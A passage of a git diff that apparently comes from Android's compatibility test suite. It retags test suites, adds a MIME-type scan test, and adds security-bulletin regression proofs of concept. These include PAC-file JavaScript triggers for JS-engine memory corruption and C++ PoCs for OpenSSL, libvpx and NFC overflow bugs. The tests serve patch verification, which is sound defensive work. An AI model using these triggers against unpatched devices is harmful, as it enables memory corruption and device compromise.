sdk_version: "test_current",
srcs: ["ScopedStorageTestHelper/src/**/*.java"],
// Tag as a CTS artifact
- test_suites: ["device-tests", "mts", "cts"],
+ test_suites: ["device-tests", "mts-mediaprovider", "cts"],
}
android_test {
@@ -76,7 +76,7 @@
srcs: ["src/**/*.java"],
static_libs: ["truth-prebuilt", "cts-scopedstorage-lib"],
compile_multilib: "both",
- test_suites: ["general-tests", "mts", "cts"],
+ test_suites: ["general-tests", "mts-mediaprovider", "cts"],
sdk_version: "test_current",
java_resources: [
":CtsScopedStorageTestAppA",
@@ -91,7 +91,7 @@
srcs: ["legacy/src/**/*.java"],
static_libs: ["truth-prebuilt", "cts-scopedstorage-lib"],
compile_multilib: "both",
- test_suites: ["general-tests", "mts", "cts"],
+ test_suites: ["general-tests", "mts-mediaprovider", "cts"],
sdk_version: "test_current",
target_sdk_version: "29",
java_resources: [
@@ -106,7 +106,7 @@
"host/src/android/scopedstorage/cts/host/BaseHostTestCase.java"
],
libs: ["tradefed", "testng"],
- test_suites: ["general-tests", "mts", "cts"],
+ test_suites: ["general-tests", "mts-mediaprovider", "cts"],
test_config: "CoreTest.xml",
}
@@ -114,7 +114,7 @@
name: "CtsScopedStorageHostTest",
srcs: ["host/src/**/*.java"],
libs: ["tradefed", "testng"],
- test_suites: ["general-tests", "mts", "cts"],
+ test_suites: ["general-tests", "mts-mediaprovider", "cts"],
test_config: "AndroidTest.xml",
}
@@ -122,7 +122,7 @@
name: "CtsScopedStoragePublicVolumeHostTest",
srcs: ["host/src/**/*.java"],
libs: ["tradefed", "testng"],
- test_suites: ["general-tests", "mts"],
+ test_suites: ["general-tests", "mts-mediaprovider"],
test_config: "PublicVolumeTest.xml",
}
@@ -133,7 +133,7 @@
srcs: ["device/**/*.java"],
static_libs: ["truth-prebuilt", "cts-scopedstorage-lib"],
compile_multilib: "both",
- test_suites: ["device-tests", "mts", "cts"],
+ test_suites: ["device-tests", "mts-mediaprovider", "cts"],
sdk_version: "test_current",
libs: ["android.test.base", "android.test.mock", "android.test.runner",],
java_resources: [
diff --git a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java
index 966f96d..81d40d2 100644
--- a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java
+++ b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java
@@ -211,7 +211,8 @@
@Parameter(0)
public String mVolumeName;
- @Parameters
+ /** Parameters data. */
+ @Parameters(name = "volume={0}")
public static Iterable<? extends Object> data() {
return ScopedStorageDeviceTest.getTestParameters();
}
@@ -1536,6 +1537,39 @@
}
/**
+ * Test that ScanFile() after renaming file extension updates the right
+ * MIME type from the file metadata.
+ */
+ @Test
+ public void testScanUpdatesMimeTypeForRenameFileExtension() throws Exception {
+ final String audioFileName = "ScopedStorageDeviceTest_" + NONCE;
+ final File mpegFile = new File(getMusicDir(), audioFileName + ".mp3");
+ final File nonMpegFile = new File(getMusicDir(), audioFileName + ".snd");
+ try {
+ // Copy audio content to mpegFile
+ try (InputStream in =
+ getContext().getResources().openRawResource(R.raw.test_audio);
+ FileOutputStream out = new FileOutputStream(mpegFile)) {
+ FileUtils.copy(in, out);
+ out.getFD().sync();
+ }
+ assertThat(MediaStore.scanFile(getContentResolver(), mpegFile)).isNotNull();
+ assertThat(getFileMimeTypeFromDatabase(mpegFile)).isEqualTo("audio/mpeg");
+
+ // This rename changes MIME type from audio/mpeg to audio/basic
+ assertCanRenameFile(mpegFile, nonMpegFile);
+ assertThat(getFileMimeTypeFromDatabase(nonMpegFile)).isNotEqualTo("audio/mpeg");
+
+ assertThat(MediaStore.scanFile(getContentResolver(), nonMpegFile)).isNotNull();
+ // Above scan should read file metadata and update the MIME type to audio/mpeg
+ assertThat(getFileMimeTypeFromDatabase(nonMpegFile)).isEqualTo("audio/mpeg");
+ } finally {
+ mpegFile.delete();
+ nonMpegFile.delete();
+ }
+ }
+
+ /**
* Test that app without write permission for file can't update the file.
*/
@Test
diff --git a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java
index 80a90c1..19d521d 100644
--- a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java
+++ b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java
@@ -823,7 +823,7 @@
*/
public static void assertDirectoryContains(@NonNull File dir, File... expectedContent) {
assertThat(dir.isDirectory()).isTrue();
- assertThat(Arrays.asList(dir.listFiles())).containsAllIn(expectedContent);
+ assertThat(Arrays.asList(dir.listFiles())).containsAtLeastElementsIn(expectedContent);
}
public static File getExternalStorageDir() {
diff --git a/hostsidetests/scopedstorage/res/raw/test_audio.mp3 b/hostsidetests/scopedstorage/res/raw/test_audio.mp3
new file mode 100644
index 0000000..4fe9228
--- /dev/null
+++ b/hostsidetests/scopedstorage/res/raw/test_audio.mp3
Binary files differ
diff --git a/hostsidetests/securitybulletin/Android.bp b/hostsidetests/securitybulletin/Android.bp
index f17395e..49c5dfd 100644
--- a/hostsidetests/securitybulletin/Android.bp
+++ b/hostsidetests/securitybulletin/Android.bp
@@ -37,11 +37,12 @@
compile_multilib: "both",
multilib: {
lib32: {
- suffix: "32",
+ suffix: "_sts32",
},
lib64: {
- suffix: "64",
+ suffix: "_sts64",
},
+ // build/soong/common/arch.go default returns nil; no default possible
},
arch: {
arm: {
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index a6b5c79..bd55c9b 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -27,7 +27,6 @@
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
- <option name="test-file-name" value="OomCatcher.apk" />
<option name="test-file-name" value="MainlineModuleDetector.apk" />
<option name="test-file-name" value="hotspot.apk" />
</target_preparer>
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0224.pac b/hostsidetests/securitybulletin/res/cve_2020_0224.pac
new file mode 100644
index 0000000..6b8f689
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0224.pac
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+function gc() {
+ for (let i = 0; i < 0x10; i++)
+ new ArrayBuffer(0x800000);
+}
+function to_dict(obj) {
+obj.__defineGetter__('x',()=>2);
+obj.__defineGetter__('x',()=>2);
+}
+function fk() {
+rgx = null;
+dbl_arr = [1.1, 2.2, 3.3, 4.4];
+o = {};
+o.__defineGetter__("length", ()=> {
+ rgx = new RegExp(/AAAAAAAA/y);
+ return 2;
+ });
+o[0] = "aaaa";
+o.__defineGetter__(1, ()=> {
+ for (let i=0;i<8;i++) dbl_arr.push(5.5);
+
+ let cnt = 0;
+ rgx[Symbol.replace]("AAAAAAAA", {
+ toString: ()=> {
+ cnt++;
+ if (cnt == 2) {
+ rgx.lastIndex = {valueOf: ()=> {
+ to_dict(rgx);
+ gc();
+ return 0;
+ }};
+
+ }
+
+ return 'BBBB$';
+ }
+ });
+ return "bbbb";
+ });
+p = new Proxy( {}, {
+ ownKeys: function(target) {
+ return o;
+ },
+ getOwnPropertyDescriptor(target, prop) {
+ return {configurable: true, enumerable: true, value: 5};
+ }
+ });
+
+Object.keys(p);
+alert (dbl_arr[0]);
+if (dbl_arr[0] == 1.1) {
+ fail("failed to corrupt dbl_arr");
+}
+}
+
+function FindProxyForURL(url, host) {
+fk();
+return "DIRECT";
+}
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.info b/hostsidetests/securitybulletin/res/cve_2020_0383.info
new file mode 100644
index 0000000..175c47c
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0383.info
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.xmf b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf
new file mode 100644
index 0000000..921efe1
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2021_0393.pac b/hostsidetests/securitybulletin/res/cve_2021_0393.pac
new file mode 100644
index 0000000..42038b61
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2021_0393.pac
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+function FindProxyForURL(url, host) {
+ let s = String.fromCharCode(0x4141).repeat(0x10000001) + "A";
+ s = "'" + s + "'";
+ eval(s);
+ return "DIRECT";
+}
diff --git a/hostsidetests/securitybulletin/res/cve_2021_0396.pac b/hostsidetests/securitybulletin/res/cve_2021_0396.pac
new file mode 100644
index 0000000..5677445
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2021_0396.pac
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+function FindProxyForURL(url, host){
+ var evil_call = eval("(function(" + Array(65535).fill("x").join(",") + "){})");
+ f(evil_call());
+ return "DIRECT";
+}
+
+function f(){}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp
index 6f087cc..10bbf66 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp
@@ -26,9 +26,6 @@
"frameworks/av/media/libmedia/include",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
shared_libs: [
"libstagefright",
@@ -37,7 +34,6 @@
"libstagefright_foundation",
"libdatasource",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp
new file mode 100644
index 0000000..9a85317
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2016-2182",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libcrypto",
+ "libssl",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp
new file mode 100644
index 0000000..78e1e73
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp
@@ -0,0 +1,138 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dlfcn.h>
+#include <string.h>
+#include <openssl/ssl.h>
+#include <openssl/crypto.h>
+#include <openssl/bn.h>
+#include <memory>
+#include "../includes/common.h"
+
+/** NOTE: These values are for the BIGNUM declared in kBN2DecTests and */
+/** must be updated if kBN2DecTests is changed. */
+#if _32_BIT
+#define ALLOCATION_SIZE 52
+static const int sMallocSkipCount[] = {1,0};
+#else
+#define ALLOCATION_SIZE 56
+static const int sMallocSkipCount[] = {0,0};
+#endif
+
+static const char *kTest =
+ "123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890";
+
+static int sCount = 0;
+static bool sOverloadMalloc = false;
+int loopIndex = 0;
+
+template<typename T>
+struct OpenSSLFree {
+ void operator()(T *buf) {
+ OPENSSL_free(buf);
+ }
+};
+
+using ScopedOpenSSLString = std::unique_ptr<char, OpenSSLFree<char>>;
+
+namespace crypto {
+template<typename T, void (*func)(T*)>
+struct OpenSSLDeleter {
+ void operator()(T *obj) {
+ func(obj);
+ }
+};
+
+template<typename Type, void (*Destroyer)(Type*)>
+struct OpenSSLDestroyer {
+ void operator()(Type* ptr) const {
+ Destroyer(ptr);
+ }
+};
+
+template<typename T, void (*func)(T*)>
+using ScopedOpenSSLType = std::unique_ptr<T, OpenSSLDeleter<T, func>>;
+
+template<typename PointerType, void (*Destroyer)(PointerType*)>
+using ScopedOpenSSL =
+std::unique_ptr<PointerType, OpenSSLDestroyer<PointerType, Destroyer>>;
+
+struct OpenSSLFree {
+ void operator()(uint8_t* ptr) const {
+ OPENSSL_free(ptr);
+ }
+};
+
+using ScopedBIGNUM = ScopedOpenSSL<BIGNUM, BN_free>;
+using ScopedBN_CTX = ScopedOpenSSLType<BN_CTX, BN_CTX_free>;
+} // namespace crypto
+
+static int DecimalToBIGNUM(crypto::ScopedBIGNUM *out, const char *in) {
+ BIGNUM *raw = nullptr;
+ int ret = BN_dec2bn(&raw, in);
+ out->reset(raw);
+ return ret;
+}
+
+void* (*realMalloc)(size_t) = nullptr;
+
+void mtraceInit(void) {
+ realMalloc = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc");
+ return;
+}
+
+void *malloc(size_t size) {
+ if (realMalloc == nullptr) {
+ mtraceInit();
+ }
+ if (!sOverloadMalloc) {
+ return realMalloc(size);
+ }
+ if (size == ALLOCATION_SIZE) {
+ if (sCount >= sMallocSkipCount[loopIndex]) {
+ return nullptr;
+ }
+ ++sCount;
+ }
+ return realMalloc(size);
+}
+
+using namespace crypto;
+
+int main() {
+ CRYPTO_library_init();
+ ScopedBN_CTX ctx(BN_CTX_new());
+ if (!ctx) {
+ return EXIT_FAILURE;
+ }
+ for(loopIndex = 0; loopIndex < 2; ++loopIndex) {
+ ScopedBIGNUM bn;
+ int ret = DecimalToBIGNUM(&bn, kTest);
+ if (!ret) {
+ return EXIT_FAILURE;
+ }
+ sOverloadMalloc = true;
+ ScopedOpenSSLString dec(BN_bn2dec(bn.get()));
+ sOverloadMalloc = false;
+ if (!dec) {
+ return EXIT_FAILURE;
+ }
+ if (strcmp(dec.get(), kTest)) {
+ return EXIT_FAILURE;
+ }
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp
index c2b7636..630cb39 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp
@@ -39,10 +39,6 @@
"android.hidl.allocator@1.0",
"android.hardware.media.omx@1.0",
],
- suffix: "32",
- },
- lib64: {
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
index 2139583..a3928d7 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
@@ -39,10 +39,6 @@
"android.hidl.allocator@1.0",
"android.hardware.media.omx@1.0",
],
- suffix: "32",
- },
- lib64: {
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp
new file mode 100644
index 0000000..9b478eb
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2017-13194",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ shared_libs: [
+ "liblog",
+ ],
+ include_dirs: [
+ "external/libvpx/libvpx",
+ "external/libvpx/libvpx/vpx_ports",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp
new file mode 100644
index 0000000..f11cac9
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp
@@ -0,0 +1,127 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dlfcn.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include "../includes/memutils.h"
+#include "vpx/vp8cx.h"
+#include "vpx/vpx_codec.h"
+#include "vpx/vpx_encoder.h"
+
+#define ENCODE_WIDTH 11
+#define ENCODE_HEIGHT 10000
+#define LIBNAME "/system/apex/com.android.media.swcodec/lib64/libvpx.so"
+#define LIBNAME_APEX "/apex/com.android.media.swcodec/lib64/libvpx.so"
+
+char enable_selective_overload = ENABLE_NONE;
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+ vpx_codec_err_t codec_return = VPX_CODEC_OK;
+ vpx_codec_enc_cfg_t mCodecConfiguration;
+ vpx_image_t raw_frame;
+ uint32_t framerate = (30 << 16);
+ vpx_codec_iface_t *(*func_ptr1)() =
+ (vpx_codec_iface_t * (*)()) dlsym(libHandle, "vpx_codec_vp8_cx");
+ if (!func_ptr1) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ vpx_codec_iface_t *mCodecInterface = (*func_ptr1)();
+ if (!mCodecInterface) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ vpx_codec_err_t (*func_ptr2)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int) =
+ (vpx_codec_err_t(*)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int))dlsym(
+ libHandle, "vpx_codec_enc_config_default");
+ if (!func_ptr2) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ codec_return = (*func_ptr2)(mCodecInterface, &mCodecConfiguration, 0);
+ mCodecConfiguration.g_w = ENCODE_WIDTH;
+ mCodecConfiguration.g_h = ENCODE_HEIGHT;
+ vpx_codec_ctx_t mCodecContext;
+ vpx_codec_err_t (*func_ptr3)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *,
+ vpx_codec_flags_t, int) =
+ (vpx_codec_err_t(*)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *,
+ vpx_codec_flags_t, int))dlsym(libHandle, "vpx_codec_enc_init_ver");
+ if (!func_ptr3) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ codec_return = (*func_ptr3)(&mCodecContext, mCodecInterface, &mCodecConfiguration, 0,
+ VPX_ENCODER_ABI_VERSION);
+
+ if (codec_return != VPX_CODEC_OK) {
+ return EXIT_FAILURE;
+ }
+ unsigned char *source = (unsigned char *)memalign(16, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2));
+ if (!source) {
+ return EXIT_FAILURE;
+ }
+ memset(source, 0, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2));
+ vpx_image_t (*func_ptr4)(vpx_image_t *, vpx_img_fmt_t, unsigned int, unsigned int, unsigned int,
+ unsigned char *) =
+ (vpx_image(*)(vpx_image *, vpx_img_fmt, unsigned int, unsigned int, unsigned int,
+ unsigned char *))dlsym(libHandle, "vpx_img_wrap");
+ if (!func_ptr4) {
+ dlclose(libHandle);
+ free(source);
+ return EXIT_FAILURE;
+ }
+ (*func_ptr4)(&raw_frame, VPX_IMG_FMT_I420, ENCODE_WIDTH, ENCODE_HEIGHT, 1, source);
+ vpx_codec_err_t (*func_ptr5)(vpx_codec_ctx_t *, const vpx_image_t *, vpx_codec_pts_t,
+ unsigned long, vpx_enc_frame_flags_t, unsigned long) =
+ (vpx_codec_err_t(*)(vpx_codec_ctx *, const vpx_image *, long, unsigned long, long,
+ unsigned long))dlsym(libHandle, "vpx_codec_encode");
+ if (!func_ptr5) {
+ dlclose(libHandle);
+ free(source);
+ return EXIT_FAILURE;
+ }
+ codec_return =
+ (*func_ptr5)(&mCodecContext, &raw_frame, framerate,
+ (uint32_t)(((uint64_t)1000000 << 16) / framerate), 0, VPX_DL_REALTIME);
+ if (codec_return != VPX_CODEC_OK) {
+ free(source);
+ return EXIT_FAILURE;
+ }
+ vpx_codec_err_t (*func_ptr6)(vpx_codec_ctx_t *) =
+ (vpx_codec_err_t(*)(vpx_codec_ctx *))dlsym(libHandle, "vpx_codec_destroy");
+ if (!func_ptr6) {
+ dlclose(libHandle);
+ free(source);
+ return EXIT_FAILURE;
+ }
+ (*func_ptr6)(&mCodecContext);
+ enable_selective_overload = ENABLE_NONE;
+ dlclose(libHandle);
+ free(source);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp
new file mode 100644
index 0000000..ac45cc9
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9558",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ include_dirs: [
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/gki/ulinux",
+ "system/nfc/src/include",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp
new file mode 100644
index 0000000..e20c0f2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include <stdlib.h>
+
+#include <nfc_api.h>
+#include <rw_int.h>
+
+#define INITIAL_VALUE 0xBE
+#define NUM_BYTES 1
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void rw_t2t_handle_rsp(uint8_t *p_data);
+
+void poc_cback(tRW_EVENT event, tRW_DATA *p_rw_data) {
+ (void)event;
+ (void)p_rw_data;
+}
+
+int main() {
+ tRW_T2T_CB *p_t2t = &rw_cb.tcb.t2t;
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+ p_t2t->state = RW_T2T_STATE_DETECT_TLV;
+ p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
+ p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
+ p_t2t->found_tlv = TAG_LOCK_CTRL_TLV;
+ p_t2t->bytes_count = NUM_BYTES;
+ p_t2t->tlv_value[1] = UINT8_MAX;
+ uint8_t *base_ptr = (uint8_t *)(p_t2t->lockbyte + RW_T1T_MAX_LOCK_BYTES);
+ memset((void *)base_ptr, INITIAL_VALUE, sizeof(tRW_T1T_LOCK));
+ uint8_t data[T2T_READ_DATA_LEN];
+ rw_t2t_handle_rsp(data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp
new file mode 100644
index 0000000..86b23dc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9561",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp
new file mode 100644
index 0000000..6c4ccf2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
